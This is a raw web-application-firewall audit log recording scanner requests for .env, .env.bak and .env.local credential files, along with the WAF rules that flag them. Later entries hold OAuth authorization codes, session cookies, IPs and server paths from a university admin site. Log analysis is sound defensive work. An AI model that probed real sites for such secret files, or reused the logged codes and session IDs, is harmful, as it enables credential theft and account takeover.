(http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dbec575e-Z-- --0fb08032-A-- [24/Jul/2025:08:24:42.446111 +0300] aIHDmkdutIOpb_kg22gesQAAABI 84.247.144.138 51204 127.0.0.1 7081 --0fb08032-B-- GET /.env HTTP/1.0 Host: limitless.jac.group X-Real-IP: 84.247.144.138 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --0fb08032-F-- HTTP/1.1 403 Forbidden Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "31b-5dfc34833f116" Accept-Ranges: bytes Content-Length: 795 Content-Type: text/html --0fb08032-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "limitless.jac.group"] [uri "/.env"] [unique_id "aIHDmkdutIOpb_kg22gesQAAABI"] Apache-Error: [file "mod_access_compat.c"] [line 350] [level 3] AH01797: client denied by server configuration: /var/www/vhosts/jac.group/limitless.jac.group/.env Stopwatch: 1753334682441710 4581 (- - -) Stopwatch2: 1753334682441710 4581; combined=2498, p1=2387, p2=0, p3=0, p4=0, p5=111, sr=269, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0fb08032-Z-- --40a26d7a-A-- [24/Jul/2025:08:24:43.290585 +0300] aIHDm0dutIOpb_kg22gesgAAABQ 84.247.144.138 34188 127.0.0.1 7081 --40a26d7a-B-- GET /app/.env HTTP/1.0 Host: limitless.jac.group X-Real-IP: 84.247.144.138 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --40a26d7a-F-- HTTP/1.1 403 Forbidden Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "31b-5dfc34833f116" Accept-Ranges: bytes Content-Length: 795 Content-Type: text/html --40a26d7a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "limitless.jac.group"] [uri "/app/.env"] [unique_id "aIHDm0dutIOpb_kg22gesgAAABQ"] Apache-Error: [file "mod_access_compat.c"] [line 350] [level 3] AH01797: client denied by server configuration: /var/www/vhosts/jac.group/limitless.jac.group/app/.env Stopwatch: 1753334683289107 1589 (- - -) Stopwatch2: 1753334683289107 1589; combined=691, p1=601, p2=0, p3=0, p4=0, p5=89, sr=177, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --40a26d7a-Z-- --39a00c4b-A-- [24/Jul/2025:08:24:45.345591 +0300] aIHDnFooLYw4or2LgWLhqwAAAMw 84.247.144.138 34226 127.0.0.1 7081 --39a00c4b-B-- GET /.env.bak HTTP/1.0 Host: limitless.jac.group X-Real-IP: 84.247.144.138 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --39a00c4b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/8.1.33 Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8 --39a00c4b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||limitless.jac.group|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "limitless.jac.group"] [uri "/.env.bak"] [unique_id "aIHDnFooLYw4or2LgWLhqwAAAMw"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||limitless.jac.group|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "limitless.jac.group"] [uri "/.env.bak"] [unique_id "aIHDnFooLYw4or2LgWLhqwAAAMw"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'jac_limitless.languages' doesn't exist in /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php:414\\nStack trace:\\n#0 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(414): PDO->prepare()\\n#1 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(753): Illuminate\\\\Database\\\\Connection->Illuminate\\\\Database\\\\{closure}()\\n#2 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(720): Illuminate\\\\Database\\\\Connection->runQueryCallback()\\n#3 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(422): Illuminate\\\\Database\\\\Connection->run()\\n#4 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Datab...PHP message: PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'jac_limitless.languages' doesn't exist in /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php:414\\nStack trace:\\n#0 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(414): PDO->prepare()\\n#1 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(753): Illuminate\\\\Database\\\\Connection->Illuminate\\\\Database\\\\{closure}()\\n#2 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(720): Illuminate\\\\Database\\\\Connection->runQueryCallback()\\n#3 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(422): Illuminate\\\\Database\\\\Connection->run()\\n#4 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Datab...' Apache-Handler: proxy:unix:/var/www/vhosts/system/limitless.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334684214782 1130893 (- - -) Stopwatch2: 1753334684214782 1130893; combined=2845, p1=521, p2=1961, p3=0, p4=0, p5=362, sr=157, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --39a00c4b-Z-- --23ff1f6c-A-- [24/Jul/2025:08:24:46.251260 +0300] aIHDnlooLYw4or2LgWLhsQAAAMA 84.247.144.138 34304 127.0.0.1 7081 --23ff1f6c-B-- GET /.env.example HTTP/1.0 Host: limitless.jac.group X-Real-IP: 84.247.144.138 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --23ff1f6c-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close X-Accel-Version: 0.01 Last-Modified: Sun, 07 May 2023 07:42:58 GMT ETag: "2b6-5fb15abc12480" Accept-Ranges: bytes Content-Length: 694 Cache-Control: max-age=86400 Expires: Fri, 25 Jul 2025 05:24:46 GMT --23ff1f6c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "limitless.jac.group"] [uri "/.env.example"] [unique_id "aIHDnlooLYw4or2LgWLhsQAAAMA"] Stopwatch: 1753334686238955 12386 (- - -) Stopwatch2: 1753334686238955 12386; combined=2545, p1=606, p2=1783, p3=32, p4=34, p5=90, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --23ff1f6c-Z-- --450e9400-A-- [24/Jul/2025:08:24:49.005267 +0300] aIHDn1ooLYw4or2LgWLhtwAAAM0 84.247.144.138 34392 127.0.0.1 7081 --450e9400-B-- GET /.env.local HTTP/1.0 Host: limitless.jac.group X-Real-IP: 84.247.144.138 X-Accel-Internal: /internal-nginx-static-location Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* --450e9400-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/8.1.33 Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8 --450e9400-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "limitless.jac.group"] [uri "/.env.local"] [unique_id "aIHDn1ooLYw4or2LgWLhtwAAAM0"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'jac_limitless.languages' doesn't exist in /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php:414\\nStack trace:\\n#0 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(414): PDO->prepare()\\n#1 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(753): Illuminate\\\\Database\\\\Connection->Illuminate\\\\Database\\\\{closure}()\\n#2 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(720): Illuminate\\\\Database\\\\Connection->runQueryCallback()\\n#3 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(422): Illuminate\\\\Database\\\\Connection->run()\\n#4 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Datab...PHP message: PHP Fatal error: Uncaught PDOException: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'jac_limitless.languages' doesn't exist in /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php:414\\nStack trace:\\n#0 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(414): PDO->prepare()\\n#1 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(753): Illuminate\\\\Database\\\\Connection->Illuminate\\\\Database\\\\{closure}()\\n#2 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(720): Illuminate\\\\Database\\\\Connection->runQueryCallback()\\n#3 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Database/Connection.php(422): Illuminate\\\\Database\\\\Connection->run()\\n#4 /var/www/vhosts/jac.group/limitless.jac.group/vendor/laravel/framework/src/Illuminate/Datab...' Apache-Handler: proxy:unix:/var/www/vhosts/system/limitless.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334687915761 1089611 (- - -) Stopwatch2: 1753334687915761 1089611; combined=3050, p1=695, p2=2100, p3=0, p4=0, p5=254, sr=194, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --450e9400-Z-- --d446910d-A-- [24/Jul/2025:08:27:25.907650 +0300] aIHEPVooLYw4or2LgWLnQwAAANQ 212.28.242.186 60090 127.0.0.1 7081 --d446910d-B-- GET /administration/index.php?code=4/0AVMBsJjh_qYiot33UXqqKkMan-jP_DWzY63jkMhS0EMMxNemcO0mEryggoRNUpB9dKfVfQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8 priority: u=0, i cookie: PHPSESSID=oa3ok1f92g3u312j96r10ptla2 --d446910d-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --d446910d-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHEPVooLYw4or2LgWLnQwAAANQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753334845522756 385763 (- - -) Stopwatch2: 1753334845522756 385763; combined=4456, p1=583, p2=3490, p3=174, p4=62, p5=147, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d446910d-Z-- --d678e85e-A-- [24/Jul/2025:08:31:34.455979 +0300] aIHFNlooLYw4or2LgWLulwAAAME 195.112.198.68 47222 127.0.0.1 7081 --d678e85e-B-- GET /administration/index.php?code=4/0AVMBsJgXgvletSxi2LNvirfWk34nsU5synf2zb4YV9FHl5muUHkt8nxYkvBFfWAXKGs0fA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=lp3j3g08c95boe09s0bsionoo2 --d678e85e-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --d678e85e-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHFNlooLYw4or2LgWLulwAAAME"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753335094045473 410780 (- - -) Stopwatch2: 1753335094045473 410780; combined=4923, p1=625, p2=3987, p3=119, p4=60, p5=131, sr=170, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d678e85e-Z-- --8b9c554f-A-- [24/Jul/2025:08:34:54.220513 +0300] aIHF_VooLYw4or2LgWLz7wAAAM8 195.112.198.68 42002 127.0.0.1 7081 --8b9c554f-B-- GET /administration/index.php?code=4/0AVMBsJgn9GFNlhGiJDZ1LroH5vRrc479T9NEsA_1yXzHRMa02ASmgkwkyb2_xkYb69fsbQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=hvva38ip8a44f1aatti7dtm5l1 --8b9c554f-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --8b9c554f-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHF_VooLYw4or2LgWLz7wAAAM8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753335293524457 696331 (- - -) Stopwatch2: 1753335293524457 696331; combined=4700, p1=576, p2=3754, p3=113, p4=77, p5=179, sr=154, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8b9c554f-Z-- --6af6a967-A-- [24/Jul/2025:08:36:49.534299 +0300] aIHGcVooLYw4or2LgWL1agAAAM8 195.112.198.68 37090 127.0.0.1 7081 --6af6a967-B-- GET /administration/index.php?code=4/0AVMBsJgVkcqBlq1cHbxdDiQagMp8zr5HyTrD-KyRlNO28unUeNKQT0ENcs5VrBNnH4rkHw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=cbm1oakl0f868ouoiisu0ahph4 --6af6a967-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --6af6a967-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHGcVooLYw4or2LgWL1agAAAM8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753335409089365 445090 (- - -) Stopwatch2: 1753335409089365 445090; combined=5072, p1=750, p2=3987, p3=95, p4=87, p5=152, sr=175, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6af6a967-Z-- --c3f0e72c-A-- 